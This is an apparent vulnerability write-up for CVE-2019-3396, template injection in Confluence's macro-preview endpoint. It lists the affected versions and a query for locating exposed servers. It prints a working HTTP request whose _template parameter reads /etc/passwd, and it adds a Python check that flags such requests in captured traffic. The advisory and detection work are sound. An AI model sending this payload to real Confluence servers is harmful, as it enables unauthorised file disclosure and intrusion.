Atlassian Confluence preview SSTI template injection vulnerability CVE-2019-3396
Vulnerability Description
Confluence is enterprise knowledge-management and collaboration software, often used to build company wikis. The vulnerability lies in the Widget Connector macro: the `_template` parameter of the macro-preview request is used as a template location without validation, so a crafted request can point it at a local file or a remote template (server-side template injection, SSTI).
Vulnerability Impact
Atlassian Confluence < 6.6.12
Atlassian Confluence 6.7.0-6.12.2
Atlassian Confluence < 6.13.3
Atlassian Confluence < 6.14.2
Network asset search query
app="ATLASSIAN-Confluence"
Vulnerability reproduction
Login page
Send the following request to the macro preview endpoint:
```http
POST /rest/tinymce/1/macro/preview HTTP/1.1
Host:
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3670.0 Safari/537.36
Content-Type: application/json; charset=utf-8
Content-Length: 176

{"contentId":"786457","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc5","width":"1000","height":"1000","_template":"file:///etc/passwd"}}}
```
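As an added detection example (not code from the original post), the check below inspects a captured macro-preview request and flags any caller-supplied `_template` parameter, which a legitimate editor request never sends; the sample requests are constructed here, the first one reusing the PoC body shown above.

```python
import json
from typing import Optional

# Endpoint abused by CVE-2019-3396 (from the request on this page).
PREVIEW_PATH = "/rest/tinymce/1/macro/preview"


def inspect_preview_request(method: str, path: str, body: str) -> Optional[str]:
    """Return a finding if a macro-preview request carries a caller-supplied
    _template parameter, otherwise None. Only the request line and JSON body
    are needed, so this works on a WAF/proxy capture or a request log that
    records bodies."""
    if method.upper() != "POST" or path.split("?", 1)[0] != PREVIEW_PATH:
        return None
    try:
        data = json.loads(body)
    except ValueError:
        return None  # not JSON: nothing to inspect here
    macro = data.get("macro") if isinstance(data, dict) else None
    if not isinstance(macro, dict):
        return None
    params = macro.get("params")
    if not isinstance(params, dict) or "_template" not in params:
        return None
    template = str(params["_template"])
    # Report the scheme: the page's PoC uses file:///, but any caller-controlled
    # template location is the same issue, so do not match a single string.
    scheme = template.split(":", 1)[0].lower() if ":" in template else "(none)"
    return f"macro={macro.get('name')} _template={template} scheme={scheme}"


# Constructed sample requests: the PoC body from this page, then a benign
# widget preview without _template, then a request to another endpoint.
SAMPLES = [
    ("POST", PREVIEW_PATH,
     '{"contentId":"786457","macro":{"name":"widget","body":"","params":'
     '{"url":"https://www.viddler.com/v/23464dc5","width":"1000","height":"1000",'
     '"_template":"file:///etc/passwd"}}}'),
    ("POST", PREVIEW_PATH,
     '{"contentId":"786457","macro":{"name":"widget","body":"","params":'
     '{"url":"https://www.viddler.com/v/23464dc5","width":"1000","height":"1000"}}}'),
    ("GET", "/rest/api/content/786457", ""),
]


def scan(samples=SAMPLES) -> list:
    """Run the check over a list of (method, path, body) tuples."""
    return [inspect_preview_request(m, p, b) for m, p, b in samples]


if __name__ == "__main__":
    for sample, finding in zip(SAMPLES, scan()):
        print(sample[0], sample[1], "->", finding or "ok")
```

Only the PoC request is flagged; the benign widget preview and the unrelated endpoint return None.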
This post is licensed under CC BY 4.0 by the author.